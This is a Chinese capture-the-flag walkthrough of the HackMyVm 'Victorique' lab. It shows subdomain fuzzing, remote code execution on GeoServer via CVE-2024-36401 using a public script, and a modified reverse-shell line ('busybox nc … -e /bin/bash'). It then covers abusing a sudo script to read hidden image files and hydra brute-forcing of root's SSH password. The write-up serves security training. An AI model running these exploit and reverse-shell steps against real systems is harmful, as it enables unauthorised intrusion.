文章总结: 本文记录HackMyVm靶场Victorique渗透流程。通过子域名枚举发现隐藏站点,利用GeoServerCVE-2024-36401漏洞获取Shell。Root权限需借助sudo脚本转码隐藏图片提取密码片段并组合爆破。文章展示了详细的信息收集与利用步骤。
综合评分: 89
文章分类: 渗透测试,实战经验,WEB安全,漏洞分析,漏洞POC
HackMyVm靶场之Victorique
原创
MS02423
MS02423
2025年12月27日 23:16
天津
这个靶场最重要的就是信息收集,而且是子域名收集,前半部分user的flag还是比较简单的,后面root的flag我是没有想到的,它不是去提权的,而是去通过脚本去收集root的密码的。
1.探测IP
靶场IP是192.168.137.208
2.扫描IP
1)扫描端口
我们可以看到只有80和22端口,所以我们只能在80端口进行信息收集了,然后在22端口进行登录即可
2)扫描目录
我们可以看到没有什么到任何的东西,那么我们看看web界面也没有信息吧
3.访问IP
我们可以看到IP和域名没有进行绑定,我们进行绑定即可,记得Windows和kali都需要进行绑定,不然的话kali里面的工具是无法进行扫描的。
4,渗透测试
http://victorique.xyz/
我们访问域名可以看到访问成功的
我们可以看到一个登录页面
http://victorique.xyz/login
但是我们没有用户名和密码,我们是登录不了的,而且爆破有可能是爆破不出来的的,那么我们就需要换换思路了,我们知道它是一个域名,那么我们试试爆破域名试试也没有子域名。
爆破子域名
我们还是使用wfuzz工具,不过我们需要更换字典的,我们使用域名字典,我们可以看到好多都是89ch,那么我们过滤89然后剩下的就是它的子域名了
wfuzz -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u victorique.xyz -H 'Host: FUZZ.victorique.xyz'
我们可以看到还真有一个子域名,首先,我们还是需要去绑定子域名的,不然的话,还是访问不了的。
wfuzz -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u victorique.xyz -H 'Host: FUZZ.victorique.xyz' --hh 89
访问子域名
http://gifts.victorique.xyz/
我们可以看到用户名和密码,可以看到密码是挡住的,你只要鼠标点一下就可以看到密码了
尝试登录
ookami:GoS1CK
那么我们可以试试登录前面的登录页面,发现是没有作用的
http://victorique.xyz/login
我们可以看到翻译是隐藏的更深,那么我们还是需要去扫描的。
扫描之前,我们试试ssh登录,结果还是没有用的
扫描子域名
那么,我们就扫描扫描这个子域名试试
gobuster dir -u http://gifts.victorique.xyz/ -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,txt,html,zip
我们可以看到扫描到一个目录,我们去访问看看
http://gifts.victorique.xyz/greatgifts.txt
可以猜测它又是一个子域名,我们去访问看看
http://ka4zuyakujo0.victorique.xyz/
geoserver漏洞
我们可以看到一个geoserver目录,我们点击查看
http://ka4zuyakujo0.victorique.xyz/geoserver/web/?0
还是没有看懂,我们去查看这是什么东西
可以看到是一个软件,那么既然是软件那就一定有漏洞,我们去搜索相关的漏洞试试看
我们可以看到有一个远程代码执行漏洞,我们去看看github上面
CVE-2024-36401
https://github.com/kkhackz0013/CVE-2024-36401
可以看到一个py文件,那么猜测就是使用python
我们下载到本机里面,然后去利用这个脚本,我们直接按照上面的操作进行,端口修改一下我们只有80端口
反弹shell
python3 CVE-2024-36401.py --target ka4zuyakujo0.victorique.xyz/ --target_port 80 --myip 192.168.137.102 --myport 1234
告诉我们是成功了,但是却没有反弹过来shell,我们去看看脚本文件
可以看到它是使用nc进行反弹的,既然没有反弹那就是没有nc,我们使用busybox试试看,我们修改脚本文件
busybox nc {_ip} {_myport} -e /bin/bash
我们再次进行反弹试试看,为了和上面区分开,我们使用5000端口
python3 CVE-2024-36401.py --target ka4zuyakujo0.victorique.xyz --target_port 80 --myip 192.168.137.102 --myport 5555
我们可以看到反弹成功的
获取user的flag
我们在家目录下,发现user的flag
我们还可以看到一个提示的文件
看到这个我们可以猜测到我们是没有办法进行提权的,而是通过寻找一些有用的片段,并将它们转换成了可视化的形式,应该是root的密码
我们是没有提权的方法的
然后我本来想试试,上传脚本看看,结果没有wget
反弹的shell不是很好,我们使用ssh进行登录
我们可以看到没有.ssh目录,我们进行新建可以看到成功创建,然后我们写入kali的公钥,我们进行登录
ssh [email protected]
我们可以看到登录成功的
图片转换文字
然后我们一顿分析,结果还是没有分析出来有用的信息
我去查看victorique用户的文件,结果给我出来一大堆,我直接懵了
然后我就没有思路了,我去看了看wp,告诉可以使用sudo -l的,密码在/var/www/html/login.php文件里面的
我们可以看到可以执行这个脚本的,我们去看看脚本怎么使用
输入图片然后会输出文件的,这个脚本的大概作用就是把一个图片转换成文件,然后我们去查看
我们去搜索隐藏文件
find / -type f -name '.*' 2>/dev/null | grep -Pv 'share|sys|tmp|cron' | xargs ls -l
查找系统中所有隐藏文件(以.开头的文件)排除路径中包含 "share"、"sys"、"tmp"、"cron" 的文件以详细格式列出剩余隐藏文件的权限、所有者、大小等信息
我们可以看到好多都是.png文件,我们一个一个去查看
我们使用上面的脚本,我们随便转换一个图片去看看,能不能转换成功
sudo /usr/bin/python3 /opt/img2txt.py --output /var/www/html/MS02423.txt --input /etc/ssh/.shinigami.png
可以看到转换成功,我们去访问看看
http://victorique.xyz/MS02423.txt
我们可以看到文字,但是有点不好看,我们进行简体字看看
sudo /usr/bin/python3 /opt/img2txt.py --mode=simple --output /var/www/html/MS02423.txt --input /etc/ssh/.shinigami.png
我们可以看到是C11pp3r5,然后我们一个一个去这样查看
我们查看下一个图片发现不是的,而是一个图片。
sudo /usr/bin/python3 /opt/img2txt.py --mode=simple --output /var/www/html/MS02423.txt --input /home/victorique/.kagura.png
那么,我们猜测应该不只是图片的,我们需要一个一个去查看的
sudo /usr/bin/python3 /opt/img2txt.py --mode=simple --output /var/www/html/MS02423.txt --input /usr/games/.haru.ppm
有找到一个ch4mp
还有一个就是这个10n5h1p,接下来我们就是将这三个片段组合起来,然后去爆破root的密码
我就直接使用了6种组合,就是让它们3个片段的位置不一样即可
然后我们直接去爆破root密码即可
hydra -l root -P '/home/kali/桌面/passwords.txt' ssh://192.168.137.208
我们可以看到爆破成功,我们去登录试试看
C11pp3r5ch4mp10n5h1p
ssh [email protected]
我们可以看到登录成功,而且root的flag是图片形式的,我们下载到本地
我们查看flag即可
至此,这个靶场渗透成功
总体来说,这个靶场我觉得算是容易的,因为前面的部分就是信息收集子域名,然后直接去使用脚本即可,都不需要我们过于的操作的,后面的root密码需要我们去一个一个找的,这个感觉有点没有什么用,好像是没有什么考点的,不过前面的脚本转换我们可以学习学习。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:MS02423 MS02423《HackMyVm靶场之Victorique》